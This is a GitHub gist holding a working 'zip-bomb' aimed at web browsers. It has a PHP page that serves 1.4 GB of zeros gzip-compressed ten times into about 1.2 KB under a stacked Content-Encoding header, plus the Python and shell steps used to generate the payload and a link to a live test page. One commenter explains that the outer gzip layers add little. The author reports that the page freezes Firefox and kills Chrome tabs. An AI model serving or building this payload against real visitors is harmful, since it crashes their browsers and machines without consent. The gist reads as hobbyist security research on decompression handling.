Created
December 20, 2014 01:06
-
-
Save anonymous/9a66c8199c863f226149 to your computer and use it in GitHub Desktop.
firefox zip-bomb
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| a first try of a zip-bomb, based on maulwuffs work | |
| http://noxxi.de/research/content-encoding-online-scanner.html | |
| see this discussion: https://www.reddit.com/r/netsec/comments/2ptj33/is_this_url_safe_hiding_malware_in_plain_sight/ | |
| contact: https://twitter.com/moduloo1 | |
| this 1.9k php-file below kills my firefox and renders my desktop unusable, while | |
| on chrome the tab gets killed after 30seconds (did not tried any other browsers) | |
| most interesting part is the Content-Encoding gzip, gzip.. (10 times); | |
| testpage: http://fump.8ack.org/zipzap | |
| <?php | |
| // based on http://noxxi.de/research/content-encoding-online-scanner.html | |
| header('HTTP/1.0 200 ok'); | |
| header('Content-type: text/html'); | |
| header('Content-Encoding: gzip, gzip, gzip, gzip, gzip, gzip, gzip, gzip, gzip, gzip'); | |
| // 1.4gb file, compressed 10 times with gzip and base64encoded | |
| echo base64_decode('H4sICNjBlFQAA251bGx4LnR4dAABaASX+x+LCAjYwZRUAANudWxseC50eHQAAUcEuPsfiwgI2MGUVAADbnVsbHgudHh0AAEmBNn7H4sICNjBlFQAA251bGx4LnR4dACT7+bguHFwSggDc15pTk6FXklFCQPjV2auP/LYJK4wa2OX2Mzsg1Xi7dTf/pMCJY7HG+mvVns1q3LlimtqmVnTVy4VvXrt7DWfbLFq77N662q6vU5ys4RsNntpdlbPeemmZbErtnCamOZsOzNn11PWM4qZs4KDXNqZ9jn8Y5T9Nq/Obv79/c8rtz3f/Tmxw9bGZP472SMx5wo5lax1jK2Fpa+Gvct9sMRMqvlaWWv1DxtNO3ntyGV7e9fvWzXntd2d1yurPv3o+N37SHbty1Niy/7bTI1mKl5YPf9vF//x179XcUvvYZrn+Ys96Nrzn2ou1V+09dYHp3zy/u3zRuWvgPbtxD2bD2eYXm6911mm7Z6QeW3ikqjUh3Y9k0Uqc801Zb59607LjOU+vSYt8qwxz8EQRecXAq8zJFxd+oRCS/xd5zXbrrUP3Hxxkcc2X7Xbnm2Hp77iltBUjTp1deq6ujz1yq4TN06/m5I+Wd7uSEiLvHhnvK/aW7EDT0p+rNbfp1k179laLY+nTqY7Sl+VXtOcmXauacfBtmDBaaohxTeOTDBc/ueDeM9Vi83e1hNcLb+Hrnqn2aWaMfG+3J9X8YyGG7TOmsQ97e3+deqH4kFftlM7d6/5tOVA1tk59k1CSlocajsk58s8E9ry+vau6tTtQivEM2Z+uDPjucfm++f/Tbzlymqwc+PLddOnrpN6fUlzL2NWcC2ntUufqcyGPcnvmzN9+faXX/279WuuW3WNyJWPvtPn/X6wKFq42UvVx/f/BvPrQvNrg8/4xNa9ceF52sice/iutfPTCN+iAP/Tch0POrfp1b0TiinJ2W+jvXcN87Llk2ZlXyvN80rdosi/6r5x6dV0jll/HvPOnsq+NTMvKrwu4++Pg7ouSYo+2dO8Nn/y15M4v0K07IDs/ncvum9GT/lo3tZ68MqU6R78/HP+3tlWE2yjq2C78pmBt9s6mziZKPtlebumMAq/qZNX9M364vtxt/mqvwdNDn758v3G437zzMT8qMrTC3/pPjjBVDDxTIFPqn7rrS3fA0tf/TGd3fVikt+KayZ8U5f82j2hm5dH78rHyRbtTen7edI+5W6USEvITHf+fO7m+bfnWtYkqbbovzm6NN066Pn+2Q/DMrsTm4I9OhkmCM19MkGIUUGVydGLpXkKh0zHFI57IpqCIi5eLI1TXqi0T+Fg0BTkCFISWOKi4NHpZ+bqxdIwhYNJ82Ikn+bH+wqqTUB9TWB9L1KCl7gweHQqAM18+i+8c8mziWe5xafGG3PlLm9/YXE6aU7YzK0lYh96C9337PVMz84Xn7Q46LbHbOUJGhwTLvzYvXF/1L3lLNmqDAyx3txLNzMzMLzlqBG7AqQZ6uXTvgJpAK/uIG0WBAAApTx/VCYEAADEv3kIRwQAAK7uu4VoBAAA'); | |
| exit(0); | |
| ?> | |
| ###################################################################### | |
| # how to generate the base64 - string | |
| $ cat null.txt | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| $ ls -la null.txt | |
| -rw-r----- 1 mex mex 1.4K Dec 20 01:08 null.txt | |
| # generate a 1.4 GB file with zeros only | |
| #!/usr/bin/python | |
| out_file = "nullx.txt" | |
| null_string = """000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| 000000000000000000000000000000000000000000000000000000000000000000000 | |
| """ | |
| print "> generating out_file" | |
| f = open(out_file, "w") | |
| for i in range(1,1000000): | |
| f.write(null_string) | |
| f.close() | |
| print "> done" | |
| ############################### | |
| $ python make_null.txt | |
| $ $ ls -la null*.txt | |
| -rw-r----- 1 mex mex 1.4K Dec 20 01:08 null.txt | |
| -rw-r----- 1 mex mex 1.4G Dec 20 01:24 nullx.txt | |
| # gzip 10 times | |
| $ for i in 1 2 3 4 5 6 7 8 9 10; do echo "step $i"; time gzip nullx.txt; ls -lah nullx.txt*; mv nullx.txt.gz nullx.txt; done | |
| step 1 | |
| real 1m8.656s | |
| user 0m31.974s | |
| sys 0m2.600s | |
| -rw-r----- 1 mex mex 4.6M Dec 20 01:24 nullx.txt.gz | |
| step 2 | |
| real 0m0.259s | |
| user 0m0.084s | |
| sys 0m0.048s | |
| -rw-r----- 1 mex mex 9.4K Dec 20 01:24 nullx.txt.gz | |
| step 3 | |
| real 0m0.064s | |
| user 0m0.000s | |
| sys 0m0.032s | |
| -rw-r----- 1 mex mex 947 Dec 20 01:24 nullx.txt.gz | |
| step 4 | |
| real 0m0.037s | |
| user 0m0.000s | |
| sys 0m0.032s | |
| -rw-r----- 1 mex mex 980 Dec 20 01:24 nullx.txt.gz | |
| step 5 | |
| real 0m0.044s | |
| user 0m0.000s | |
| sys 0m0.028s | |
| -rw-r----- 1 mex mex 1013 Dec 20 01:24 nullx.txt.gz | |
| step 6 | |
| real 0m0.054s | |
| user 0m0.000s | |
| sys 0m0.028s | |
| -rw-r----- 1 mex mex 1.1K Dec 20 01:24 nullx.txt.gz | |
| step 7 | |
| real 0m0.053s | |
| user 0m0.004s | |
| sys 0m0.020s | |
| -rw-r----- 1 mex mex 1.1K Dec 20 01:24 nullx.txt.gz | |
| step 8 | |
| real 0m0.053s | |
| user 0m0.000s | |
| sys 0m0.032s | |
| -rw-r----- 1 mex mex 1.1K Dec 20 01:24 nullx.txt.gz | |
| step 9 | |
| real 0m0.056s | |
| user 0m0.004s | |
| sys 0m0.028s | |
| -rw-r----- 1 mex mex 1.2K Dec 20 01:24 nullx.txt.gz | |
| step 10 | |
| real 0m0.081s | |
| user 0m0.000s | |
| sys 0m0.032s | |
| -rw-r----- 1 mex mex 1.2K Dec 20 01:24 nullx.txt.gz | |
| # original filesize: 1.4 GB | |
| # 10 trimes compressed: 1.2K | |
| $ base64 nullx.txt.gz -> this is 1.4gb 00 only compresse | |
| H4sICNjBlFQAA251bGx4LnR4dAABaASX+x+LCAjYwZRUAANudWxseC50eHQAAUcEuPsfiwgI2MGU | |
| VAADbnVsbHgudHh0AAEmBNn7H4sICNjBlFQAA251bGx4LnR4dACT7+bguHFwSggDc15pTk6FXklF | |
| CQPjV2auP/LYJK4wa2OX2Mzsg1Xi7dTf/pMCJY7HG+mvVns1q3LlimtqmVnTVy4VvXrt7DWfbLFq | |
| 77N662q6vU5ys4RsNntpdlbPeemmZbErtnCamOZsOzNn11PWM4qZs4KDXNqZ9jn8Y5T9Nq/Obv79 | |
| /c8rtz3f/Tmxw9bGZP472SMx5wo5lax1jK2Fpa+Gvct9sMRMqvlaWWv1DxtNO3ntyGV7e9fvWzXn | |
| td2d1yurPv3o+N37SHbty1Niy/7bTI1mKl5YPf9vF//x179XcUvvYZrn+Ys96Nrzn2ou1V+09dYH | |
| p3zy/u3zRuWvgPbtxD2bD2eYXm6911mm7Z6QeW3ikqjUh3Y9k0Uqc801Zb59607LjOU+vSYt8qwx | |
| z8EQRecXAq8zJFxd+oRCS/xd5zXbrrUP3Hxxkcc2X7Xbnm2Hp77iltBUjTp1deq6ujz1yq4TN06/ | |
| m5I+Wd7uSEiLvHhnvK/aW7EDT0p+rNbfp1k179laLY+nTqY7Sl+VXtOcmXauacfBtmDBaaohxTeO | |
| TDBc/ueDeM9Vi83e1hNcLb+Hrnqn2aWaMfG+3J9X8YyGG7TOmsQ97e3+deqH4kFftlM7d6/5tOVA | |
| 1tk59k1CSlocajsk58s8E9ry+vau6tTtQivEM2Z+uDPjucfm++f/Tbzlymqwc+PLddOnrpN6fUlz | |
| L2NWcC2ntUufqcyGPcnvmzN9+faXX/279WuuW3WNyJWPvtPn/X6wKFq42UvVx/f/BvPrQvNrg8/4 | |
| xNa9ceF52sice/iutfPTCN+iAP/Tch0POrfp1b0TiinJ2W+jvXcN87Llk2ZlXyvN80rdosi/6r5x | |
| 6dV0jll/HvPOnsq+NTMvKrwu4++Pg7ouSYo+2dO8Nn/y15M4v0K07IDs/ncvum9GT/lo3tZ68MqU | |
| 6R78/HP+3tlWE2yjq2C78pmBt9s6mziZKPtlebumMAq/qZNX9M364vtxt/mqvwdNDn758v3G437z | |
| zMT8qMrTC3/pPjjBVDDxTIFPqn7rrS3fA0tf/TGd3fVikt+KayZ8U5f82j2hm5dH78rHyRbtTen7 | |
| edI+5W6USEvITHf+fO7m+bfnWtYkqbbovzm6NN066Pn+2Q/DMrsTm4I9OhkmCM19MkGIUUGVydGL | |
| pXkKh0zHFI57IpqCIi5eLI1TXqi0T+Fg0BTkCFISWOKi4NHpZ+bqxdIwhYNJ82Ikn+bH+wqqTUB9 | |
| TWB9L1KCl7gweHQqAM18+i+8c8mziWe5xafGG3PlLm9/YXE6aU7YzK0lYh96C9337PVMz84Xn7Q4 | |
| 6LbHbOUJGhwTLvzYvXF/1L3lLNmqDAyx3txLNzMzMLzlqBG7AqQZ6uXTvgJpAK/uIG0WBAAApTx/ | |
| VCYEAADEv3kIRwQAAK7uu4VoBAAA | |
| # as one string -> insert in php (see above) | |
| H4sICNjBlFQAA251bGx4LnR4dAABaASX+x+LCAjYwZRUAANudWxseC50eHQAAUcEuPsfiwgI2MGUVAADbnVsbHgudHh0AAEmBNn7H4sICNjBlFQAA251bGx4LnR4dACT7+bguHFwSggDc15pTk6FXklFCQPjV2auP/LYJK4wa2OX2Mzsg1Xi7dTf/pMCJY7HG+mvVns1q3LlimtqmVnTVy4VvXrt7DWfbLFq77N662q6vU5ys4RsNntpdlbPeemmZbErtnCamOZsOzNn11PWM4qZs4KDXNqZ9jn8Y5T9Nq/Obv79/c8rtz3f/Tmxw9bGZP472SMx5wo5lax1jK2Fpa+Gvct9sMRMqvlaWWv1DxtNO3ntyGV7e9fvWzXntd2d1yurPv3o+N37SHbty1Niy/7bTI1mKl5YPf9vF//x179XcUvvYZrn+Ys96Nrzn2ou1V+09dYHp3zy/u3zRuWvgPbtxD2bD2eYXm6911mm7Z6QeW3ikqjUh3Y9k0Uqc801Zb59607LjOU+vSYt8qwxz8EQRecXAq8zJFxd+oRCS/xd5zXbrrUP3Hxxkcc2X7Xbnm2Hp77iltBUjTp1deq6ujz1yq4TN06/m5I+Wd7uSEiLvHhnvK/aW7EDT0p+rNbfp1k179laLY+nTqY7Sl+VXtOcmXauacfBtmDBaaohxTeOTDBc/ueDeM9Vi83e1hNcLb+Hrnqn2aWaMfG+3J9X8YyGG7TOmsQ97e3+deqH4kFftlM7d6/5tOVA1tk59k1CSlocajsk58s8E9ry+vau6tTtQivEM2Z+uDPjucfm++f/Tbzlymqwc+PLddOnrpN6fUlzL2NWcC2ntUufqcyGPcnvmzN9+faXX/279WuuW3WNyJWPvtPn/X6wKFq42UvVx/f/BvPrQvNrg8/4xNa9ceF52sice/iutfPTCN+iAP/Tch0POrfp1b0TiinJ2W+jvXcN87Llk2ZlXyvN80rdosi/6r5x6dV0jll/HvPOnsq+NTMvKrwu4++Pg7ouSYo+2dO8Nn/y15M4v0K07IDs/ncvum9GT/lo3tZ68MqU6R78/HP+3tlWE2yjq2C78pmBt9s6mziZKPtlebumMAq/qZNX9M364vtxt/mqvwdNDn758v3G437zzMT8qMrTC3/pPjjBVDDxTIFPqn7rrS3fA0tf/TGd3fVikt+KayZ8U5f82j2hm5dH78rHyRbtTen7edI+5W6USEvITHf+fO7m+bfnWtYkqbbovzm6NN066Pn+2Q/DMrsTm4I9OhkmCM19MkGIUUGVydGLpXkKh0zHFI57IpqCIi5eLI1TXqi0T+Fg0BTkCFISWOKi4NHpZ+bqxdIwhYNJ82Ikn+bH+wqqTUB9TWB9L1KCl7gweHQqAM18+i+8c8mziWe5xafGG3PlLm9/YXE6aU7YzK0lYh96C9337PVMz84Xn7Q46LbHbOUJGhwTLvzYvXF/1L3lLNmqDAyx3txLNzMzMLzlqBG7AqQZ6uXTvgJpAK/uIG0WBAAApTx/VCYEAADEv3kIRwQAAK7uu4VoBAAA |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I hope you realise that
You may be thinking of 42.zip (named for its 42kb size), in which there are several layers each containing 16 zip files that were the output of the previous compression. Thus leverages the ability of zip archives to contain multiple files (which gzip lacks), so that 42.zip expands to just over 1 million files of 4.3 GB each, totalling an incredible 4.5 petabytes.
In your case, the outermost layers of gzip are trivial and don't really contribute to the outcome at all, though I'd certainly be interested if you could create exponential growth using this.